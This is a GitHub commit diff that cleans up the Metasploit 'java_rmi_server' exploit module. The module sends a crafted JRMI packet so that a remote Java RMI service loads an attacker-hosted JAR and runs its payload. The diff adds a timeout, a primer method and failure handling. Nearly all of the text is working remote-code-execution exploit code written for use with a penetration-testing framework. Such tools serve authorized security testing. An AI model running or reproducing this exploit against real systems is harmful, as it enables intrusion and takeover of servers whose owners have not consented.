Land #4203, @jvazquez-r7's cleanup for java_rmi_server
This commit is contained in:
Spencer McIntyre
commit
6d966dbbcf
|
|
@ -161,6 +161,11 @@ module Exploit::Remote::TcpServer
|
|||
self.service.close
|
||||
self.service.stop
|
||||
end
|
||||
|
||||
if service.kind_of?(Rex::Proto::Http::Server)
|
||||
service.stop
|
||||
end
|
||||
|
||||
self.service = nil
|
||||
rescue ::Exception
|
||||
end
|
||||
|
|
|
|||
|
|
@ -8,8 +8,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -38,10 +38,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Oct 15 2011',
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Privileged' => true,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
{
|
||||
|
|
@ -74,16 +78,41 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||
register_options([
|
||||
Opt::RPORT(1099),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
], self.class)
|
||||
|
||||
register_autofilter_ports([ 1098, 1099 ])
|
||||
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||
end
|
||||
|
||||
def exploit
|
||||
start_service()
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delay
|
||||
raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
|
||||
rescue Msf::Exploit::Failed
|
||||
# When the server stops due primer failing, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delays
|
||||
raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
|
||||
rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
|
||||
# When the primer fails due to an error connecting with
|
||||
# the rhost, re-raise RuntimeError so it won't wait the
|
||||
# full wfs_delays
|
||||
raise ::RuntimeError, e.message
|
||||
end
|
||||
end
|
||||
|
||||
def peer
|
||||
"#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def primer
|
||||
connect
|
||||
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
|
|
@ -99,32 +128,29 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
packet[idx, find_me.length] = len + new_url
|
||||
|
||||
# write out minimal header and packet
|
||||
print_status("Connected and sending request for #{new_url}")
|
||||
print_status("#{peer} - Connected and sending request for #{new_url}")
|
||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
|
||||
|
||||
buf = ""
|
||||
1.upto(6) do
|
||||
res = sock.get_once(-1, 5) rescue nil
|
||||
break if not res
|
||||
break unless res
|
||||
break if session_created?
|
||||
buf << res
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if buf =~ /RMI class loader disabled/
|
||||
print_error("Not exploitable: the RMI class loader is disabled")
|
||||
return
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled")
|
||||
end
|
||||
|
||||
print_good("Target #{rhost}:#{rport} may be exploitable...")
|
||||
|
||||
# Wait for the request to be handled
|
||||
1.upto(120) do
|
||||
break if session_created?
|
||||
select(nil, nil, nil, 0.25)
|
||||
handler()
|
||||
if buf =~ /java.lang.ClassNotFoundException/
|
||||
fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Target may be exploitable...")
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
@ -145,6 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
print_status("Replied to request for payload JAR")
|
||||
stop_service
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue